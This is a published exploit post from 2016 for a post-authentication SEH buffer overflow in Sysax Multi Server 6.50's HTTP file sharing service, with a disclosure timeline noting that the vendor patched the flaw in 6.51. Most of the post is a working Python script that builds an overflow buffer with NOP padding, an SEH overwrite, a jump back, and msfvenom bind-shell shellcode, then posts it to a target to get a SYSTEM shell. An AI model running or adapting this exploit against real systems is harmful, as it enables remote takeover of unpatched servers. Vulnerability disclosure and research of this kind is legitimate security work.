Sysax Multi Server 6.50 SEH Overflow
Posted on 22 March 2016
# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit # Date: 03/21/2016 # Exploit Author: Paul Purcell # Contact: ptpxploit at gmail # Vendor Homepage: http://www.sysax.com/ # Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date) # Version: Sysax Multi Server 6.50 # Tested on: Windows XP SP3 English # Category: Remote Code Execution # # Timeline: 03/11/16 Bug found # 03/14/16 Vender notified # 03/17/16 Vender acknowledges issue and publishes patch (6.51) # 03/21/16 Exploit Published # # Summary: This is a post authentication exploit that requires the HTTP file sharing service to be running on # Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the # service. Once exploited, the shellcode runs with SYSTEM privileges. In this example, we attack folder_ # in dltslctd_name1.htm. The root path of the user shouldn't break the buffer offset in the stack, though # the user will need to have permission to delete folders. If the user has file delete permissions, file_ # will work as well. mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can # be modified to adapt to a users permissions. import httplib target = 'webbackup' port = 80 sid = '57e546cb7204b60f0111523409e49bdb16692ab5' #retrieved from browser URL after login #example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm #msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "x00x0a" shell=("x6ax52x59xd9xeexd9x74x24xf4x5bx81x73x13xd7xae" "x73xe9x83xebxfcxe2xf4x2bx46xf1xe9xd7xaex13x60" "x32x9fxb3x8dx5cxfex43x62x85xa2xf8xbbxc3x25x01" "xc1xd8x19x39xcfxe6x51xdfxd5xb6xd2x71xc5xf7x6f" "xbcxe4xd6x69x91x1bx85xf9xf8xbbxc7x25x39xd5x5c" "xe2x62x91x34xe6x72x38x86x25x2axc9xd6x7dxf8xa0" "xcfx4dx49xa0x5cx9axf8xe8x01x9fx8cx45x16x61x7e" "xe8x10x96x93x9cx21xadx0ex11xecxd3x57x9cx33xf6" "xf8xb1xf3xafxa0x8fx5cxa2x38x62x8fxb2x72x3ax5c" "xaaxf8xe8x07x27x37xcdxf3xf5x28x88x8exf4x22x16" "x37xf1x2cxb3x5cxbcx98x64x8axc6x40xdbxd7xaex1b" "x9exa4x9cx2cxbdxbfxe2x04xcfxd0x51xa6x51x47xaf" "x73xe9xfex6ax27xb9xbfx87xf3x82xd7x51xa6x83xdf" "xf7x23x0bx2axeex23xa9x87xc6x99xe6x08x4ex8cx3c" "x40xc6x71xe9xc6xf2xfax0fxbdxbex25xbexbfx6cxa8" "xdexb0x51xa6xbexbfx19x9axd1x28x51xa6xbexbfxda" "x9fxd2x36x51xa6xbex40xc6x06x87x9axcfx8cx3cxbf" "xcdx1ex8dxd7x27x90xbex80xf9x42x1fxbdxbcx2axbf" "x35x53x15x2ex93x8ax4fxe8xd6x23x37xcdxc7x68x73" "xadx83xfex25xbfx81xe8x25xa7x81xf8x20xbfxbfxd7" "xbfxd6x51x51xa6x60x37xe0x25xafx28x9ex1bxe1x50" "xb3x13x16x02x15x83x5cx75xf8x1bx4fx42x13xeex16" "x02x92x75x95xddx2ex88x09xa2xabxc8xaexc4xdcx1c" "x83xd7xfdx8cx3c") arg="folder_" #can also be changed to file_ if user has file delete permissions pid="dltslctd_name1" #Can be changed, though padding will needed to be updated as well junk1="A"*26400 #Initial pile of junk noppad="x90"*296 #Place to land from our long jump and before our shellcode junkfill="x90"*(768-len(shell)) #Fill in after our shellcode till nseh nseh="xebx06x90x90" #Short jump over SEH seh="xd7x2ax92x5d" #pop esi # pop edi # ret RPCNS4.dll jump="xe9x13xfcxffxff" #jump back 1000 bytes for plenty of room for your shellcode junk2="D"*9500 #Junk at the end buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2) head = "Host: Wee! " head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0 " head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " head += "Accept-Language: en-us,en;q=0.5 " head += "Accept-Encoding: gzip, deflate " head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm " head += "Proxy-Connection: keep-alive " head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425 " head += "Content-Length: 1337 " head += "If-Modified-Since: * " head += " " head += "-----------------------------217830224120 " head += " " head += " " head += " " head += buff conn = httplib.HTTPConnection(target,port) conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)
